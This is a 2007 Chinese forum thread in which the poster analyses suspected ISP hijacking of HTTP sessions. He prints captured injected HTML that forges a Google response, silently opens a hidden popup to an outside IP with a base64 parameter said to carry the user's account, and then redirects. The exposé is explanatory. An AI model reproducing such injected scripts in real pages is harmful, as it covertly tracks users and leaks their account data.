设为首页收藏本站
开启辅助访问 切换到窄版

易码技术论坛

 找回密码
 加入易码
搜索
易码技术论坛»论坛 PC相关 Windows系统 电信的TCP会话劫持
返回列表 发新帖
查看: 561805|回复: 8

电信的TCP会话劫持

[复制链接]
Lendy
发表于 2007-1-4 19:07:05 | 显示全部楼层
广州的电信更乱。
乱弹窗,甚至有XX内容。
回复 支持 反对

举报

JAY
 楼主| 发表于 2007-1-4 19:46:14 | 显示全部楼层
弹窗就算了,电信还把用户信息直接就公布出去,卖给第三方~愤~
回复 支持 反对

举报

ForeverMai
发表于 2007-1-4 22:30:43 | 显示全部楼层
惊现L老大……
回复 支持 反对

举报

十七·烈行风
发表于 2007-1-5 09:54:50 | 显示全部楼层
惊讶
回复 支持 反对

举报

ForeverMai
发表于 2007-1-7 03:47:37 | 显示全部楼层
南京电信貌似还没出现此手段……
回复 支持 反对

举报

time868
发表于 2007-1-20 19:23:18 | 显示全部楼层
就是,这样我们用户怎能放心呢?
回复 支持 反对

举报

亚森罗宾
发表于 2007-1-22 14:54:24 | 显示全部楼层
镇江电信还算规矩.
回复 支持 反对

举报

FantasyDR
发表于 2007-1-22 18:56:44 | 显示全部楼层
orz中国的立法……居然能让这种人钻空子。
回复 支持 反对

举报

JAY
 楼主| 发表于 2007-1-4 15:52:48 | 显示全部楼层 |阅读模式
貌似目前只有成都的电信才有这个情况,我也是今天才遇上的,而且也不是什么新闻了。不过估计还是有很多朋友不了解,而且今天也搞明白了这是怎么一回事。
所以已知道或没受到其影响的朋友请无视之~~

以下转自本人的BLOG
------------------------------------------------------------------------------------------
今天上网的时候,出现了三次莫名其妙的弹窗事件,每次都是打开的http://220.167.29.103:9123/……,然后检查系统,没发现可疑加载项和进程,安全卫士也查无错误。后来百度之后得知,我们全被电信耍了。
用CommView查看访问google时候的HTTP回复报文,我们可能会发现下面这段HTML:
  1. <HTML>
  2. <script language="JavaScript">
  3. function newwin()
  4. {
  5. var urlname;
  6. var win_attr;
  7. win_attr=&#39;toolbar=no,menubar=no,scrollbars=no,status=no,location=no,resizable=no,fullscreen=no,directories=no,width=1,height=1,top=10000,left=10000 &#39;;
  8. window.open(&#39;[url]http://220.167.29.103:9123/ndatin.aspx?param=xxxxxxxxxx&ref=1[/url]&#39;,&#39;ips_win0&#39;,win_attr);
  9. }
  10. </script>
  11. <head>
  12. <title>
  13. </title>
  14. <META HTTP-EQUIV="Pragma" CONTENT="no-cache">
  15. <META http-equiv="Content-Type" content="text/html;charset=gb2312">
  16. <meta http-equiv="Refresh" content="0; url=http://www.google.com/">
  17. </head>
  18. <body onload=&#39;newwin()&#39;>
  19. </body>
  20. </html>
复制代码

这个报文的来源IP是google的,所以说这个报文是google发送过来的。但奇怪是所有本次TCP会话里面的数据包均没有google主页的任何信息。而我们所打开的google页面是通过上面的那个诡异的页面自动打开的:
  1. <meta http-equiv="Refresh" content="0; url=http://www.google.com/">
复制代码
也就是说,我们同google服务器的会话被劫持了,至于是谁搞得鬼,大家心里都清楚吧。
再来看看那个弹窗页面,注意那个参数"param=xxxxxxxxxx&ref=1",这个xxxxxxxxxx一般是以"AB"开头的,去掉"AB"后面就是经过BASE64编码之后的信息。问题的严重性便在于在这些信息之内竟然有用户的上网帐号

这个是那个弹窗的源代码:
  1. <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
  2. <HTML>
  3. <HEAD>
  4. <title></title>
  5. <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
  6. <meta name="CODE_LANGUAGE" Content="C#">
  7. <meta name="vs_defaultClientScript" content="JavaScript">
  8. <meta name="vs_targetSchema" content="[url]http://schemas.microsoft.com/intellisense/ie5[/url]">
  9. <META HTTP-EQUIV="Pragma" CONTENT="no-cache">
  10. </HEAD>
  11. <body MS_POSITIONING="GridLayout">
  12. <form name="ad" method="post" action="ndatin.aspx?param=xxxxxxxxxx" id="ad">
  13. <input type="hidden" name="__VIEWSTATE" value="dDwtNjU0MzcyMTk1Ozs+wvgAJRNX/UMv+HvJKM5Bf/strRI=" />
  14. </form>
  15. </body>
  16. </HTML>
复制代码
稍微懂点E文或者有网络经验的朋友肯定一眼就能看出那个form的含义吧~
目前就只有电信的用户出现这样的问题,网通、铁通用户尚无此现象。所以各大电信用户大家做什么事最好多个心眼。

另外公布一下某公司的主页:http://218.6.197.17/ipush.asp


地址:成都高新区高朋大道12号
邮政编码:610041
电话:028—85177339 85120897
传真:028—85120913
邮箱: mediage@163.com
每次去学校都要走那里过,真不知道这样的流氓竟然就在身边=v=
回复

举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 加入易码

本版积分规则

Archiver|手机版|小黑屋|EMAX Studio

GMT+8, 2024-4-19 07:49 , Processed in 0.011910 second(s), 18 queries .

Powered by Discuz! X3.4

© 2001-2017 Comsenz Inc.

快速回复 返回顶部 返回列表